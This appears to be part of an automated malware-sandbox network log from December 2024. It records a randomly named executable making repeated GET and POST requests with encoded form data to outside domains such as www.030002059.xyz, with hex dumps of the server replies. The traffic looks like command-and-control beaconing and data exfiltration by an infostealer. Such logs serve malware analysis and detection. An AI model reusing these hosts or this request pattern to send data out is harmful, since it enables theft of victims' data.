                                                                        Data Raw: 37 61 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 58 6d 6f db 36 10 fe 3e 60 ff 81 73 b1 60 03 24 5a 6f 96 e4 97 04 c8 9a 0c 29 d0 ac 7b 29 02 6c df 68 89 b2 b4 c9 a2 21 d2 76 d2 61 ff 7d cf 91 72 e2 64 dd d6 26 6d 7c 92 c8 bb e3 3d 77 c7 d3 51 8b af 2e de bd 7e ff eb 8f 97 ac 36 eb f6 ec cb 2f 16 c3 95 b1 45 2d 45 89 11 86 7f 0b d3 98 56 9e fd f2 fe e7 f3 f7 ef 98 cf 2e d4 5a 34 1d eb a5 96 fd 4e 96 8b b1 9b 27 e6 c5 f8 5e 6e b1 54 e5 1d d3 e6 ae 95 a7 a3 a5 28 fe 58 f5 6a db 95 7e a1 5a d5 cf d8 ab aa aa e6 ac 52 9d f1 2b b1 6e da bb 19 7b b7 91 1d fb 45 74 da 63 1a d4 87 fa 06 3c 1b 51 96 4d b7 9a b1 60 ce d6 a2 5f 35 1d dd 8e 06 e3 18 73 46 62 ed b2 d9 fd d7 7a 71 85 ff 47 ea 92 60 73 4b 3a f7 4d 69 ea 19 0b 83 e0 eb 23 ad 8f f5 1d 78 26 90 39 58 e1 b7 b2 32 33 26 b6 46 dd 0f f5 cd aa 3e 8c 8d ce 16 82 d5 bd ac 4e 47 b5 31 1b 3d 1b 8f f7 fb 3d d7 a6 17 46 f1 52 8e e0 c1 f6 74 d4 a9 4a b5 ad da 8f ee 6d 57 7d 29 e1 a1 63 8c b0 46 ef 56 ec 76 dd 76 da a9 1b b4 ed 63 ae fa d5 38 0a 82 60 0c 8e 11 db [TRUNCATED]
                                                                        Data Ascii: 7a3Xmo6>`s`$Zo){)lh!va}rd&m|=wQ.~6/E-EV.Z4N'^nT(Xj~ZR+n{Etc<QM`_5sFbzqG`sK:Mi#x&9X23&F>NG1==FRtJmW})cFVvvc8`5r=,`$cRVlarUWU,N8X/6h9buDgI^'<U4I/Nxe7Q'&x3y^~18#{#C3gL]:S#>-'d"C#!] {ctkY2/Hx1ai#'d:BBaAIgC@$mEz&30H|b+&8aiQk%4@@&Lj:`%r@j?<'Xd,M)`AXKHXRk'lu3E^$Cs,<^6OX"qTA%TV@dKa&t2!J%Ps,\O)Mcp^MsH~ajOY^CH(;(vQXdHJ^)EYBdNlVr@"2o1|@qzj1"x$)a*9EQ7{fumeHL<'+A, alhD4_C)LyT/4tP6Sy/nI,XH~% [TRUNCATED]
                                                                        Dec 13, 2024 13:10:07.610388041 CET | 899 | IN | Data Raw: 48 7c e8 87 12 4a b6 70 ed 03 80 8f 42 9b 62 45 0a 45 94 d6 13 9e fe b6 8e 26 e4 0c 4a c3 cf d9 30 61 f4 af 39 65 37 1f cc fe c4 1d 03 00 8f 77 0c 44 61 cf a4 c6 d6 fb 9c 1d b3 8e 00 1a 25 98 9c 6f 4b a8 9f 78 31 76 c7 04 34 b6 d5 12 86 d1 6e c5
                                                                        Data Ascii: H|JpBbEE&J0a9e7wDa%oKx1v4nX(3RlCTBhp=5j!Q=Ha9dGSJ=RC=C%HK#;5lL1=TI>5$u`4O"/Ij(X&AQz.}7JQd+EI?2.


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        38 | 192.168.2.4 | 50041 | 217.160.0.60 | 80 | 5580 | C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 13, 2024 13:10:08.819462061 CET | 514 | OUT | GET /tycs/?9B_ppt=JnL2shJTRGPmh49fpIgYgN5+UFlzCIkQlKFRWx+imQO/VZY5IL7EOXQuybzppj9USUhCNE2Oi8OvmQ7twQzrLnOW74Dzktiy3u2kYAFK0p92dbQcp3RrNNk=&Sbv8I=RfPDYvIHtJXp8 HTTP/1.1
                                                                        Host: www.solarand.online
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Connection: close
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Dec 13, 2024 13:10:10.090229034 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                        Content-Type: text/html
                                                                        Content-Length: 4545
                                                                        Connection: close
                                                                        Date: Fri, 13 Dec 2024 12:10:09 GMT
                                                                        Server: Apache
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 53 54 52 41 54 4f 20 2d 20 44 6f 6d 61 69 6e 20 72 65 73 65 72 76 65 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 4f 70 65 6e 20 53 61 6e 73 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 6d 61 72 67 69 6e 3a 20 30 3b 22 3e 0d 0a 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 33 66 33 66 33 3b 20 70 61 64 64 69 6e 67 3a 20 34 30 70 78 20 30 3b 20 77 69 64 74 68 3a 20 31 30 30 25 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 20 31 35 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html><html> <head> <title>STRATO - Domain reserved</title> </head> <body style="background-color: #fff; font-family: Open Sans, sans-serif; padding: 0; margin: 0;"> <div style="background-color: #f3f3f3; padding: 40px 0; width: 100%;"> <div style="width: 150px; margin-left: auto; margin-right: auto;"><a href="https://www.strato.de" rel="nofollow" style="border: 0;"> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 157.4 33.7"><defs><style>.a{fill:#f80;}.b{fill:#f80;}</style></defs><title>STRATO</title><path class="a" d="M17.8,7a4.69,4.69,0,0,1-4.7-4.7H29.6A4.69,4.69,0,0,1,34.3,7V23.5a4.69,4.69,0,0,1-4.7-4.7V9.4A2.37,2.37,0,0,0,27.2,7Z" transform="translate(-1.3 -2.3)"/><path class="b" d="M57.7,32.9c-1.3,2.5-4.7,2.6-7.3,2.6-2.1,0-4-.1-5.2-.2-1.5-.1-1.8-.5-1.8-1.3V32.9c0-1.3.2-1.7,1.4-1.7,2.1,0,3.1.2,6.2.2,2.4,0,2.9-.2,2.9-2.3,0-2.4,0-2.5-1.3-3.1a42.2,42.2,0,0,0-4.5-1.8c-3.7-1.6-4.4-2.3-4.4-6.5,0-2.6.5-4.8,3.4-5.7a14,14,0,0,1,4.9-.6c1.6, [TRUNCATED]
                                                                        Dec 13, 2024 13:10:10.090253115 CET | 1236 | IN | Data Raw: 33 2c 30 2c 31 2e 36 2c 31 2e 33 2c 32 2e 31 2e 39 2e 35 2c 32 2c 2e 38 2c 32 2e 39 2c 31 2e 33 2c 34 2e 39 2c 32 2e 31 2c 36 2c 32 2e 35 2c 36 2c 36 2e 37 61 31 30 2e 31 32 2c 31 30 2e 31 32 2c 30 2c 30 2c 31 2d 2e 36 2c 34 2e 38 4d 37 37 2e 31
                                                                        Data Ascii: 3,0,1.6,1.3,2.1.9.5,2,.8,2.9,1.3,4.9,2.1,6,2.5,6,6.7a10.12,10.12,0,0,1-.6,4.8M77.1,15.7c-2.1,0-3.7,0-5.2-.1v18a1.4,1.4,0,0,1-1.5,1.6H69c-1.1,0-1.7-.3-1.7-1.6V15.7c-1.5,0-3.2.1-5.3.1-1.5,0-1.5-.9-1.5-1.6v-.9A1.36,1.36,0,0,1,62,11.8H77.2c.8,0,1.
                                                                        Dec 13, 2024 13:10:10.090269089 CET | 1236 | IN | Data Raw: 35 73 2d 2e 36 2c 37 2e 31 2d 32 2e 36 2c 39 2e 35 4d 31 35 33 2c 31 37 2e 34 63 2d 2e 38 2d 31 2e 36 2d 32 2e 34 2d 32 2e 33 2d 34 2e 34 2d 32 2e 33 73 2d 33 2e 36 2e 36 2d 34 2e 34 2c 32 2e 33 63 2d 2e 37 2c 31 2e 35 2d 2e 38 2c 34 2e 34 2d 2e
                                                                        Data Ascii: 5s-.6,7.1-2.6,9.5M153,17.4c-.8-1.6-2.4-2.3-4.4-2.3s-3.6.6-4.4,2.3c-.7,1.5-.8,4.4-.8,6.1s.1,4.6.8,6.1,2.4,2.3,4.4,2.3,3.6-.7,4.4-2.3.8-4.2.8-6.1-.1-4.6-.8-6.1" transform="translate(-1.3 -2.3)"/><path class="a" d="M24.9,14a2.26,2.26,0,0,0-2.3-2.
                                                                        Dec 13, 2024 13:10:10.090286970 CET | 975 | IN | Data Raw: 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 22 20 6c 61 6e 67 3d 22 6e 6c 22 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 20 63 6f 6c 6f 72 3a 20 23 37 37 37 3b 20 66 6f 6e 74 2d 77 65
                                                                        Data Ascii: padding-bottom: 30px" lang="nl"><span style="font-size: 14px; color: #777; font-weight: bold;">Nederlands</span><br>Deze website werd zojuist geregistreerd. Een webinhoud werd nog niet toegevoegd.</div> <div style="padding-bottom: 30px"


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        39 | 192.168.2.4 | 50042 | 161.97.142.144 | 80 | 5580 | C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 13, 2024 13:10:15.841300964 CET | 770 | OUT | POST /er88/ HTTP/1.1
                                                                        Host: www.030002059.xyz
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Origin: http://www.030002059.xyz
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 203
                                                                        Referer: http://www.030002059.xyz/er88/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Data Raw: 39 42 5f 70 70 74 3d 76 36 51 38 63 66 4e 74 47 73 74 56 68 67 51 63 51 6f 69 6e 63 76 46 42 76 2b 46 49 4a 6f 31 30 2b 52 2b 5a 6d 32 57 46 35 72 78 51 30 7a 6f 48 38 30 67 41 65 39 75 78 6e 4b 78 6a 61 6e 63 6c 44 44 38 56 36 6a 33 79 55 55 68 6f 6c 46 61 31 34 68 4f 44 49 55 68 6e 68 66 58 65 62 79 51 2f 49 32 73 4b 77 76 46 77 6e 78 41 47 34 66 68 58 73 4d 74 77 51 77 58 53 62 33 6c 48 62 4d 46 7a 48 46 4f 74 76 78 4e 63 68 65 73 6b 30 6a 51 30 2b 6c 77 5a 6e 74 44 56 71 52 36 63 66 43 57 61 30 53 45 38 49 32 41 37 71 37 7a 57 71 59 63 33 4d 31 59 64 71 41 35 67 33 4a 77 44 43 65 51 6e 64 67 3d 3d
                                                                        Data Ascii: 9B_ppt=v6Q8cfNtGstVhgQcQoincvFBv+FIJo10+R+Zm2WF5rxQ0zoH80gAe9uxnKxjanclDD8V6j3yUUholFa14hODIUhnhfXebyQ/I2sKwvFwnxAG4fhXsMtwQwXSb3lHbMFzHFOtvxNchesk0jQ0+lwZntDVqR6cfCWa0SE8I2A7q7zWqYc3M1YdqA5g3JwDCeQndg==
                                                                        Dec 13, 2024 13:10:17.022445917 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Fri, 13 Dec 2024 12:10:16 GMT
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        ETag: W/"66cce1df-b96"
                                                                        Content-Encoding: gzip
                                                                        Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                        Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                                        Dec 13, 2024 13:10:17.022486925 CET | 370 | IN | Data Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                        Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        40 | 192.168.2.4 | 50043 | 161.97.142.144 | 80 | 5580 | C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 13, 2024 13:10:19.085571051 CET | 790 | OUT | POST /er88/ HTTP/1.1
                                                                        Host: www.030002059.xyz
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Origin: http://www.030002059.xyz
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 223
                                                                        Referer: http://www.030002059.xyz/er88/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Data Raw: 39 42 5f 70 70 74 3d 76 36 51 38 63 66 4e 74 47 73 74 56 67 41 67 63 54 50 57 6e 65 50 46 43 78 4f 46 49 66 59 31 77 2b 51 43 5a 6d 79 48 49 35 5a 46 51 36 32 55 48 75 68 4d 41 64 39 75 78 30 4b 77 6e 65 6e 63 2b 44 44 68 71 36 6a 4c 79 55 55 31 6f 6c 46 4b 31 34 57 79 41 48 6b 68 6c 70 2f 58 59 56 53 51 2f 49 32 73 4b 77 76 52 61 6e 77 6f 47 34 4f 78 58 71 64 74 7a 64 51 58 52 4d 48 6c 48 4b 63 46 2f 48 46 4f 50 76 79 4a 36 68 64 55 6b 30 69 67 30 2f 77 63 61 79 39 44 58 31 68 36 44 51 33 72 65 7a 53 42 77 4f 58 45 38 30 76 44 4c 69 2b 52 74 64 45 35 4b 34 41 64 54 71 4f 35 33 50 64 74 75 47 6c 37 71 59 4f 32 39 73 79 6d 77 48 78 43 67 66 78 6f 57 62 63 59 3d
                                                                        Data Ascii: 9B_ppt=v6Q8cfNtGstVgAgcTPWnePFCxOFIfY1w+QCZmyHI5ZFQ62UHuhMAd9ux0Kwnenc+DDhq6jLyUU1olFK14WyAHkhlp/XYVSQ/I2sKwvRanwoG4OxXqdtzdQXRMHlHKcF/HFOPvyJ6hdUk0ig0/wcay9DX1h6DQ3rezSBwOXE80vDLi+RtdE5K4AdTqO53PdtuGl7qYO29symwHxCgfxoWbcY=
                                                                        Dec 13, 2024 13:10:19.888510942 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Fri, 13 Dec 2024 12:10:19 GMT
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        ETag: W/"66cce1df-b96"
                                                                        Content-Encoding: gzip
                                                                        Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                        Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                                        Dec 13, 2024 13:10:19.888567924 CET | 370 | IN | Data Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                        Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                        41 | 192.168.2.4 | 50044 | 161.97.142.144 | 80
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 13, 2024 13:10:22.133514881 CET | 10872 | OUT | POST /er88/ HTTP/1.1
                                                                        Host: www.030002059.xyz
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Origin: http://www.030002059.xyz
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 10303
                                                                        Referer: http://www.030002059.xyz/er88/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Data Raw: 39 42 5f 70 70 74 3d 76 36 51 38 63 66 4e 74 47 73 74 56 67 41 67 63 54 50 57 6e 65 50 46 43 78 4f 46 49 66 59 31 77 2b 51 43 5a 6d 79 48 49 35 5a 64 51 36 41 67 48 38 53 30 41 63 39 75 78 33 4b 77 6b 65 6e 63 7a 44 44 70 75 36 6a 48 45 55 57 4e 6f 6b 6a 47 31 70 79 6d 41 63 30 68 6c 6c 66 58 5a 62 79 51 51 49 32 38 4f 77 76 42 61 6e 77 6f 47 34 4e 35 58 38 38 74 7a 66 51 58 53 62 33 6c 62 62 4d 45 67 48 46 47 31 76 78 6c 4d 68 73 30 6b 74 43 77 30 35 47 49 61 7a 64 44 52 30 68 37 57 51 33 76 52 7a 53 64 57 4f 58 77 61 30 6f 7a 4c 6e 4b 59 45 43 47 6c 43 6a 6d 64 57 34 74 4d 49 47 74 52 30 65 53 72 74 57 76 79 71 37 6a 75 62 4d 7a 7a 32 61 52 59 42 46 4c 78 30 4d 34 68 69 61 63 38 6b 56 47 64 46 38 7a 4f 42 57 73 4c 36 37 36 41 2f 73 7a 59 41 6d 37 58 62 5a 4c 43 53 6b 4d 4a 52 63 62 66 48 56 66 33 34 72 53 35 31 59 7a 4d 32 4e 74 41 64 65 74 36 55 77 6e 42 37 39 4a 70 78 41 73 33 39 32 52 62 71 64 49 75 75 69 55 53 49 34 71 51 35 6e 57 6f 64 37 4b 55 55 6d 58 4c 41 46 6e 4f 6b 4d 6c 45 6f 70 62 4d [TRUNCATED]
                                                                        Data Ascii: 9B_ppt=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 [TRUNCATED]
                                                                        Dec 13, 2024 13:10:23.366647959 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Fri, 13 Dec 2024 12:10:23 GMT
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        ETag: W/"66cce1df-b96"
                                                                        Content-Encoding: gzip
                                                                        Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                        Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                                        Dec 13, 2024 13:10:23.366672993 CET | 370 | IN | Data Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                        Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                        42 | 192.168.2.4 | 50045 | 161.97.142.144 | 80
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 13, 2024 13:10:24.790267944 CET | 512 | OUT | GET /er88/?9B_ppt=i44cfvhGA8d2n3UYXaCGfuZ18OIgEphd3DXa+grkxbY00W8PtxsyWNCcnvl5XmwHEQha9wDhby9/6Haw/gmAEUgIq47tXTEuO1ZaxpFdonJQgsoz6uRXQGU=&Sbv8I=RfPDYvIHtJXp8 HTTP/1.1
                                                                        Host: www.030002059.xyz
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Connection: close
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Dec 13, 2024 13:10:26.132560968 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Fri, 13 Dec 2024 12:10:25 GMT
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Content-Length: 2966
